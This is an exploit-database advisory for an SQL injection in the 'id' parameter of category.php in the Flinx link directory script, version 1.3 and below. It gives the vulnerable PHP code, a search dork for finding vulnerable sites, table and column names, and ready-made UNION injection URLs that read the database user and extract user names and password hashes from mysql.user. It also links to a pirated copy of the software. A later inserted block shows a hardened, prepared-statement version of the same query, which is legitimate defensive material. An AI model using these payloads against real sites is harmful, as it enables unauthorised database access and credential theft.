flinx <= 1.3 category.php id Remote SQL Injection Vulnerability

2008-01-25T00:00:00
ID EDB-ID:4985
Type exploitdb
Reporter Houssamix
Modified 2008-01-25T00:00:00

Description

flinx <= 1.3 (category.php id) Remote SQL Injection Vulnerability. CVE-2008-0468. Webapps exploit for php platform

--------------------------------------------------------------
            H-T Team [ HouSSaMix + ToXiC350 + RxH ]
--------------------------------------------------------------
# Author : Houssamix From H-T Team
# Script : flinx 1.3 & below                                          
# Download : http://rapidshare.com/files/86100439/flinx.rar.html (Nulled)                         
# BUG :  Remote SQL Injection Vulnerability  
# Dork : Powered by Flinx

## Vulnerable CODE :
~~~~~~~~ category.php ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
<?
$query="SELECT linkID FROM $table_link WHERE relCatID=$id";
$queryl=mysql_query($query);
$count=mysql_numrows($queryl);
$result=mysql_query("SELECT name FROM $table_cat WHERE catID=$id");
if ($row=mysql_fetch_array($result)){
do{
?>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
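
The excerpt above places the request parameter $id, unquoted, straight into both SELECT statements. A hardened form of the same lookup follows as an added example (not part of the original advisory and not Flinx code): it accepts only a positive integer id and binds it through mysqli prepared statements. The function names and the $db connection handle are assumptions; the table and column names are the ones given in this advisory.

```php
<?php
// Added example, not Flinx code. Function names and the $db handle are
// hypothetical; table and column names are taken from the advisory.
declare(strict_types=1);

mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // throw on DB errors

const TABLE_CAT  = 'flinx_cat';   // fixed names: identifiers cannot be bound
const TABLE_LINK = 'flinx_link';

// Accept only a positive decimal integer. Arrays, missing values and any
// string that is not purely an integer yield null.
function parse_category_id($raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Run a one-parameter, one-column query with the id bound as an integer,
// so the value never becomes part of the SQL text.
function fetch_scalar(mysqli $db, string $sql, int $id)
{
    $stmt = $db->prepare($sql);
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $stmt->bind_result($value);
    $found = $stmt->fetch();
    $stmt->close();
    return $found ? $value : null;
}

// Returns the category name and its link count, or null when the id is
// invalid or unknown (the caller should answer 400/404, not echo DB errors).
function load_category(mysqli $db, $rawId): ?array
{
    $id = parse_category_id($rawId);
    if ($id === null) {
        return null;
    }
    $name = fetch_scalar($db, 'SELECT name FROM ' . TABLE_CAT . ' WHERE catID = ?', $id);
    if ($name === null) {
        return null;
    }
    $count = fetch_scalar($db, 'SELECT COUNT(*) FROM ' . TABLE_LINK . ' WHERE relCatID = ?', $id);
    return ['name' => $name, 'links' => (int) $count];
}

// In category.php: $category = load_category($db, $_GET['id'] ?? null);
```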

# Exploit :
[Target.il]/[flinx_path]/category.php?id=[SQL-CODE]

Table and column names:
=> table   : flinx_cat
   columns : name / catid
=> table   : flinx_link
   columns : name / url / image / relCatID / width / height

Example :
http://site.com/flinx/category.php?id=-999 union select name from flinx_cat--

We can also try to get the user and password from mysql.user.
Our user needs to be root@localhost or a MySQL administrator; check:
http://site.com/flinx/category.php?id=-999/**/union/**/select/**/user()/*
User and password from mysql.user:
http://site.com/flinx/category.php?id=concat(user,0x203a3a20,password)/**/from/**/mysql.user/*

# Gr33tz :  CoNaN - V40 - Mahmood_ali - RaChiDoX & all muslims hackers       

# milw0rm.com [2008-01-25]